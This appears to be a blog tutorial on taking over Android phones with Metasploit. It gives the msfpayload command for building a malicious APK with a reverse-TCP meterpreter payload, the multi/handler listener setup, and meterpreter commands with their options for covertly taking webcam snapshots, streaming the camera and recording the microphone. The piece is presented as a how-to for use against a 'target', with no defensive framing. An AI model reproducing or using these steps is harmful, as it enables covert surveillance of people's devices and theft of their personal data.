AnDroid Hacking with Metaploit

With tool set currently available, hacking is become very easy. One of the example that we are going to demonstrate is Android hacking. Getting access to handheld devices is becoming more interesting due to kind of applications which are available and what these devices can do. The prime reason being they hold lot of sensitive information about the target or individual like, social data, organization data, card information, personal data, etc.


  • Kali Linux with metasploit (though it comes with Kali by default :))
  • Android phone (rooted/non-rooted any will do)
  • Both above should be connected on same wireless network


  1. Make sure that android phone is connected to a wireless network and note add its IP Address.
  2. Start Kali Linux  and make sure it is also connected to the same wireless network as of the Android device.


To start with, let’s open a terminal and type following command to note down your IP address.




Now using following command we will create our hackable android app. Change the ip after LHOST with noted ip and you can change the name of your choice for the app.

msfpayload android/meterpreter/reverse_tcp LHOST= ip LPORT=port R > hack.apk


creating hackable app

Now let’s switch on our gas by typing emsfconsole & lit it (enter) and then we will put our pan to stove by typing

use exploit/multi/handler

Let’s pour some oil for frying by typing and hit enter to set the payload for the handler.

set payload android/meterpreter/reverse_tcp


setting up payload

To make sure it is hot enough to fry, set the listener ip and port number by set lhost ip and set lport port command (ip and port should be identical as that of the previous msfpayload command). To see if the oil is hot and ready to fry set type show options and hit enter.


show options for payload

By typing exploit we wait for our droid to fall in our pan

Installing app on mobile

Installing app on mobile

Once the droid is in our pan, we can see it information by typing ifconfig or sysinfo. Further we can try different commands to take snapshots, webcam snaps, voice recording, etc.


exploiting droid

Icing on the Cake

By just putting one drop of ? you can get all possible commands available, will see few and interesting ones.


Available commands


Available commands

Sample image taken using this hack

Sample Image Capture

Sample Image Capture

Here are few list of command and their options to start with, to go further give your creativity some room 🙂

webcam_list :
This stdapi command provide you a list of all webcams on the target system. Each webcam will have an index number.

webcam_snap :
This stdapi command take a snapshot for the specified webcam, by default number 1 and will try without argument precision to open the saved snapshot.

webcam_snap could have arguments :

-h : to display the help banner.
-i : The index number of the webcam to use.
-p : The JPEG image file path. By default $HOME/[randomname].jpeg
-q : The JPEG image quality, by default ’50’.
-v : Automatically view the JPEG image, by default ‘true’.

This stdapi command record audio, by default 1 second, from the default microphone and will try without argument precision to play the captured audio wav file.

record_mic could have arguments :

-h : to display the help banner.
-d : Number of seconds to record, by default 1 second (useless).
-f : The wav file path. By default $HOME/[randomname].wav
-p : Automatically play the captured audio, by default ‘true’.

(bg)run webcam
Same as the stdapi webcam_snap command, but with loop delay interval to refresh the displayed jpeg snap. A refreshed HTML file, “webcam.htm”, will provide you each x milliseconds a new snapshot. You can invoke the webcam script with run or bgrun meterpreter command.

The possible arguments to begin a recording are :

-h : to display the help banner.
-d : Loop delay interval in milliseconds, by default 1000.
-f : Just grab a single frame.
-g : Send to the GUI instead of writing file.
-i : The index of the webcam to use, by default 1.
-l : Keep capturing in a loop, by default (useless).
-p : The path to the folder images will be saved in, by default current working directory.
-q : The JPEG quality, by default ’50’.

Tagged with: , , , , ,